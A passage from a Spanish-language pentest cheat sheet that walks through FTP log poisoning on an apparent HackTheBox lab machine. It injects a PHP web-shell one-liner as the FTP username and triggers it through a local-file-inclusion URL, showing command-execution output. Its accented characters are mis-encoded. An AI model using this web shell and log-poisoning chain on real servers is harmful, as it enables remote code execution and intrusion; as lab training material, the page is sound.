馃悋
CheatSheet
  • Inicio
  • Web Site
    • Subdomain
  • API
    • Recolecci贸n de Informacion
      • Directorios
      • OSINT
      • Enumeracion en Endpoints
    • Busqueda de Vulnerabilidades
      • Validaciones
      • Mal manejo de errores
      • Sesiones
      • IDOR
      • Ataques de Inyecci贸n
      • Exposici贸n de datos sensibles
      • Otras posibles vulnerabilidades
      • Rate Limit
      • Cors
      • Ataques de Cabeceras
      • Prototype Pollution
      • Ataque de deserializaci贸n
      • Ataques JWT
  • Mobile
    • PlayStore to APK
    • Bypass Ofuscacion Xamarin
    • Bypass Flutter
  • Miscelanio
    • SSH
    • Docker
    • DNS
    • Silver Ticket
    • LDAP
    • Shell Command Files (SCF)
    • SPOOLER
    • JuicyPotato
    • TOMCAT
    • Proc Enum
    • Primitives
    • Archivos .crash
    • Nginx
    • FTP
    • Pivoting
    • Web API to Postman
    • Web Sockets
    • OTP
    • FastInfoset
  • Post Explotaci贸n
    • Dump HTTP Credentials
  • Configuraciones Burpsuite
    • BurpCollaborator Server Privado
Powered by GitBook
On this page
  1. Miscelanio

FTP

FTP log poisoning

El archivo a infectar es el siguiente:

http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log

Para ello debemos escribir en el ftp login

ftp 10.10.10.249
Connected to 10.10.10.249.
220 (vsFTPd 3.0.3)
Name (10.10.10.249:eduardodesdes): <?php system($_GET['cmd']); ?>
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ^C
ftp> exit
221 Goodbye.

Y luego podemos ejecutar el codigo php

http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log&cmd=id

Con el output

// Some codeSat Nov 13 04:48:47 2021 [pid 27951] FTP command: Client "::ffff:10.10.16.38", "USER uid=33(www-data) gid=33(www-data) groups=33(www-data)"
...
Sat Nov 13 04:48:52 2021 [pid 27951] FTP command: Client "::ffff:10.10.16.38", "QUIT"
Sat Nov 13 04:48:52 2021 [pid 27951] FTP response: Client "::ffff:10.10.16.38", "221 Goodbye

Last updated 1 year ago